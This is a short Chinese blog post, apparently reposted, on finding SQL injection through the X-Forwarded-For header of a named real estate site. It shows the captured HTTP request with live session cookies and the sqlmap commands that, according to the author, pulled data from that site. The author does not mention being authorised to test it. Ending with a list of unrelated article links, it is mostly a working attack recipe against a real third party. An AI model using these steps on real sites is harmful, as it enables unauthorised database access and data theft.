挖掘x-forwarded-for注入
来源:互联网 发布:蒂姆邓肯数据 编辑:程序博客网 时间:2024/05/30 05:16
xx年xx月xx日我浏览一个网站的时候发现
我当时很震惊,为啥这一进去网站就爆sql注入。后来仔细一看8.8.8.8'的时候,我明白了,就在不久前,我下载过火狐的一个x-forwarded-for然后鬼使神差的在填写ip的地方加了个'
然后就有了当时的一幕
然后我抓包,直接丢sqlmap里面跑。但是我在x-forwarded-for后面加的*被无视了。不是吧,刚好看到zone里面也在讨论,他们提出的方法也是加-p参数、加--level等等,但是我全部测试,都没行。弄的本屌很伤心,只能找朋友@sex is not show帮忙,他说他读出了数据!!!
好了,既然这样那就是我的sqlmap的问题了。本屌当时很纠结了,各种想不通,他使用的是kali系统,但是我使用win下的和bt5下面的都跑不出来。难道是版本太老了?好吧,我去更新了下sqlmap的版本。最后成功注入出来贴下图
-------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------
利用firebug抓的请求包:
GET / HTTP/1.1Host: hz.zhujia360.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=103a31dd188ed133e3c8db24cf8b0967; Hm_lvt_26ab71a0888a7c7ba96d0e45748d4dc2=1392169618; Hm_lpvt_26ab71a0888a7c7ba96d0e45748d4dc2=1392169618; sgsa_id=zhujia360.com|1392169618587782; sgsa_vt_90977_93493=1392169618586; stat_mac=EF00CEA2771AC60BX-Forwarded-For: 8.8.8.8Connection: keep-aliveCache-Control: max-age=0
更新sqlmap到最新版:(一定要更新,最新版才支持 -p "X-Forwarder-For")
#./sqlmap.py --update
提交请求包注入:(-p 指定注入参数)
#./sqlmap.py -r httpreqtxt/hz.zhujia360.com.txt -p "X-Forwarded-For"
成功
参考:http://www.wooyun.org/bugs/wooyun-2010-047595
- 挖掘x-forwarded-for注入
- x-forwarded-for的深度挖掘
- x-forwarded-for的深度挖掘
- x-forwarded-for的深度挖掘
- X-Forwarded-For介绍
- 伪造 X-Forwarded-For
- X-Forwarded-For
- x-forwarded-for
- X-Forwarded-For
- 造 X-Forwarded-For
- 伪造 X-Forwarded-For
- squid X-Forwarded-For 作用
- Tomcat Access Log记录X-Forwarded-For
- Nginx代理中X-Forwarded-For
- 获取客户端IP x-forwarded-for
- request.getHeader("x-forwarded-for")获取IP
- HTTP 请求头中的 X-Forwarded-For
- ngxin proxy_set_header Host X-Forwarded-For
- angualrJS支持的event
- 做注册的验证,在服务器端处理,客服端ajax异步提交数据
- Debug Assertion Failed! f:\sp\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp Line: 42
- java 获取路径工具类
- 粒子群优化算法
- 挖掘x-forwarded-for注入
- js页面描点跳转(非常实用精简)
- 关于MySQL desc关键字误用为自定义属性引发的错误
- 《Win32多线程程序设计》(8)---Interlocked Variables
- maven src/main/java 下install非.java文件
- 推荐15款响应式Web设计测试工具
- android死机问题
- hdu 2159 FATE
- 使用BFD操作ELF